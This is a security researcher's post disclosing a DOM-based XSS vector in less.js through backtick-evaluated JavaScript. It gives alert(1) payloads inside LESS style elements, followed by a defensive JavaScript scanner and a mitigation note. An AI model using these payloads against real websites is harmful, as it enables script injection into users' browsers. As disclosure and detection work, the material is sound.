detail
LESS and Sass suddenly came to my mind while I was researching CSS injection attacks. You know, both are CSS pre-processors, so I assumed they don't support any client-side operation. That was a mistake...
I saw less.js when visiting the http://lesscss.org/ page. less.js evaluates JavaScript code wrapped in backtick characters inside LESS code, so a DOM-based XSS vulnerability arises at this point.
I published it on Twitter as a new attack vector for LESS.
XSS attack vector for LESS: a{b:`function(){alert(1)}()`;} pic.twitter.com/sukqRtKhIr
— mert (@mertistaken) October 14, 2016
shortening
Also, thanks to Rakesh Mane for the shortening!
Shorter : x{x:`alert(1)`}
— Rakesh Mane (@RakeshMane10) October 15, 2016
:)
payloads
`less.js` includes this regex pattern for the `type` attribute of the style element:
var t=/^text\/(x-)?less$/;
So it supports these payloads:
<style type='text/less'>x{x:`alert(1)`}</style>
<style type='text/x-less'>x{x:`alert(1)`}</style>
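As an added defender-side example (not code from the post or from less.js), the scanner below flags `<style>` elements whose `type` matches the less.js regex quoted above and whose body carries backtick-delimited inline JavaScript; the HTML tag parsing is a deliberately simple regex over a string and is my assumption, not how less.js locates style elements.

```javascript
// Regex quoted from less.js for the <style type="..."> attribute.
const LESS_TYPE = /^text\/(x-)?less$/;

// Matches <style ...>...</style>, capturing the attribute string and the body.
const STYLE_RE = /<style\b([^>]*)>([\s\S]*?)<\/style>/gi;
// Matches a type attribute written with double quotes, single quotes or unquoted.
const TYPE_ATTR_RE = /\btype\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/i;
// A backtick-delimited expression inside a LESS value, e.g. `alert(1)`.
const BACKTICK_RE = /`[^`]*`/g;

// Returns the type attribute value of a <style> tag, or "" when absent.
function styleType(attrs) {
  const m = TYPE_ATTR_RE.exec(attrs);
  if (!m) return "";
  return (m[1] || m[2] || m[3] || "").trim();
}

// Scans an HTML string and returns one finding per <style> element that
// less.js would compile in the browser and that contains backtick JS.
// Note: LESS_TYPE is case-sensitive, exactly as less.js applies it, so a
// 'text/LESS' element is not reported because less.js would not compile it.
function findLessInlineJs(html) {
  const findings = [];
  let m;
  STYLE_RE.lastIndex = 0;
  while ((m = STYLE_RE.exec(html)) !== null) {
    const type = styleType(m[1]);
    if (!LESS_TYPE.test(type)) continue;   // plain CSS is not compiled by less.js
    const exprs = m[2].match(BACKTICK_RE);
    if (!exprs) continue;                  // LESS without inline JavaScript
    findings.push({ type, expressions: exprs });
  }
  return findings;
}

// Constructed sample page: the two payload shapes from the post plus two
// elements that must not be flagged (LESS without backticks, and plain CSS).
const SAMPLE_HTML = [
  "<style type='text/less'>x{x:`alert(1)`}</style>",
  '<style type="text/x-less">x{x:`alert(1)`}</style>',
  "<style type='text/less'>x{color:red}</style>",
  "<style type='text/css'>x{x:`alert(1)`}</style>",
].join("\n");

console.log(findLessInlineJs(SAMPLE_HTML)); // two findings: text/less and text/x-less
```

On the mitigation side, less.js exposes a `javascriptEnabled` option, and from Less 3.0 onward inline JavaScript evaluation is off unless that option is explicitly set to true, so a scanner like this mainly matters for pages still loading older less.js builds.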